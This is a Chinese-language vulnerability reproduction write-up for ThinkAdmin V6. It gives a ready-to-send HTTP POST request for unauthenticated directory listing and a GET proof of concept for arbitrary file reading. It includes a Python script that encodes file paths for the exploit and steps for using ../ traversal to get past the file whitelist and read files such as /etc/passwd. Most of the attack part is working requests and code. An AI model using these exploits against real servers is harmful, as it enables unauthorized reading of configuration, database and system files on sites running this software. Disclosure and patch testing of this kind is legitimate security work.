ThinkAdminV6漏洞複現
一、簡介
ThinkAdmin是基于 ThinkPHP 的微信背景管理平台
二、漏洞影響版本
ThinkAdminV6
三、漏洞複現
未授權列目錄:
POC:
POST /admin.html?s=admin/api.Update/node HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
rules=%5B%22.%2F%22%5D 1、目錄周遊注意POST資料包rules參數值需要URL編碼
任意檔案讀取:
ThinkAdmin V6.0 <=2020.08.03.01
判斷版本
POC:
/admin.html?s=admin/api.Update/get/encode/xxx
檔案加密腳本
import requests,json,base64,sys
def baseN(num, b):
return ((num == 0) and "0") or \
(baseN(num // b, b).lstrip("0") + "0123456789abcdefghijklmnopqrstuvwxyz"[num % b])
def poc(url):
while 1:
s = input("請輸入需要讀取的檔案路徑:").encode('utf-8')
if str(s) == "b'exit'":
sys.exit(0)
try:
poc =""
for i in s:
poc += baseN(i,36)
print(poc)
except:
pass
if __name__ == "__main__":
if len(sys.argv) == 2:
poc(sys.argv[1])
else:
print("""
_____ _ _ _ ___ _ _
|_ _| | (_) | | / _ \ | | (_)
| | | |__ _ _ __ | | _/ /_\ \ __| |_ __ ___ _ _ __
| | | '_ \| | '_ \| |/ / _ |/ _` | '_ ` _ \| | '_ \
| | | | | | | | | | <| | | | (_| | | | | | | | | | |
\_/ |_| |_|_|_| |_|_|\_\_| |_/\__,_|_| |_| |_|_|_| |_| v6
By: yuyan-sec \t [ThinkAdmin v6 任意檔案讀取]
Usage: python poc.py [URL]
python poc.py http://127.0.0.1
""") 1、首先通過加密腳本或者檔案加密之後的一串字元
2、構造通路,成功讀取/app/admin/controller/Config.php檔案,顯示的是經過base64加密之後的字元串,需要進行base64解密
3、嘗試直接讀取别的檔案,/app/data/data.sql、/etc/passwd,直接讀取不行,因為
有一個允許的清單:
config
public/static
public/router.php
public/index.php
app/admin
app/wechat
但是可以通過../進行目錄穿越進行繞過
----------------------------------------------------------------------------------------------
參考:https://github.com/zoujingli/ThinkAdmin/issues/244
https://github.com/yuyan-sec/goTools/tree/master/ThinkAdmin